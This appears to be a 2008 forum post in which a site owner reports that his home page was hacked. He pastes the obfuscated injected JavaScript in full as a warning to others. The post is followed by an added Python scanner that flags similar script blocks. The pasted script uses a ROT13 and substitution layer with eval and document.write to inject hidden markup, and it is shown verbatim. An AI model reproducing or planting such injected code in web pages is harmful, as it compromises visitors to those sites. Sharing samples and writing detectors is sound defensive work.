Sageth
03-25-2008, 02:01 PM
Today, I was doing some maintenance that I've been putting off for a while and discovered that at the bottom of my page, I was seeing a few lines of garbage. A few Google searches later, I found that my home page was apparently 'hacked.' I didn't notice this until today and I'm on my site regularly. I also don't have any information in the logs, though I did notice that all of my index pages were scanned some time this month.
I've provided the code here for other people to be aware of. This is not a request for help or crying that Bluehost isn't protecting me, as I am fully aware of the risks and rewards of shared hosting (and the ever-evolving threats). I am in the process of checking all of my files and then I will be changing my passwords. If you have experience with web-based attacks, I would appreciate it as I am not as familiar with them as I probably should be. Fortunately, my site does not collect money, so the worst I could see happening is maybe some spam being sent out. Is there anything else I should be looking for?
Here's the code I found. I noticed that the second half of the script was visible, which makes me think it couldn't run.
<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else
if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>
The best place I've found so far to get information on it is http://www.pouet.net/topic.php?which=5006&page=1&x=22&y=11
I found other sites that look like they have more information, but I only know English and some French.
Just throwing this out here so other people can be aware of it as well. Mods, if you feel this is inappropriate or bad publicity, please feel free to lock or delete this thread.
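Added example, not part of the original post: a small Python scanner for the "checking all of my files" step, flagging `<script>` blocks that combine the traits visible in the snippet above (`eval`, `charCodeAt`, `String.fromCharCode`, a shift by 13). The extra check for scripts placed after the closing `</html>` tag, the function names, the file extensions and the sample page are assumptions made for illustration.

```python
import re
from pathlib import Path

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
HTML_END_RE = re.compile(r"</html\s*>", re.I)

# Traits taken from the injected block quoted in the post.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "charCodeAt": re.compile(r"\.charCodeAt\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode\s*\("),
    "rot13_shift": re.compile(r"[+-]\s*13\b"),
}

# Constructed sample: a harmless page with a look-alike block appended.
SAMPLE = """<html><body><script>console.log("menu");</script></body></html>
<script language=JavaScript>var s="uryyb",o="";for(i=0;i<s.length;i++){c=s.charCodeAt(i);
if(c>96&&c<110)c=c+13;else if(c>109&&c<123)c=c-13;o=o.concat(String.fromCharCode(c));}eval(o);</script>
"""

def scan_text(text, threshold=3):
    """Return one finding per suspicious <script> block in text."""
    ends = list(HTML_END_RE.finditer(text))
    html_end = ends[-1].end() if ends else None
    findings = []
    for m in SCRIPT_RE.finditer(text):
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(m.group(1)))
        # Assumption: appended code often lands after the last </html>.
        after_end = html_end is not None and m.start() >= html_end
        if len(hits) >= threshold or after_end:
            findings.append({
                "line": text.count("\n", 0, m.start()) + 1,
                "indicators": hits,
                "after_html_end": after_end,
            })
    return findings

def scan_tree(root, exts=(".html", ".htm", ".php")):
    """Scan every page under root; map file path -> findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

if __name__ == "__main__":
    for finding in scan_text(SAMPLE):
        print(finding)
```

A hit is a prompt to compare the file against a known-good copy, not proof of compromise; legitimate scripts can trip one or two indicators, which is why the threshold defaults to three.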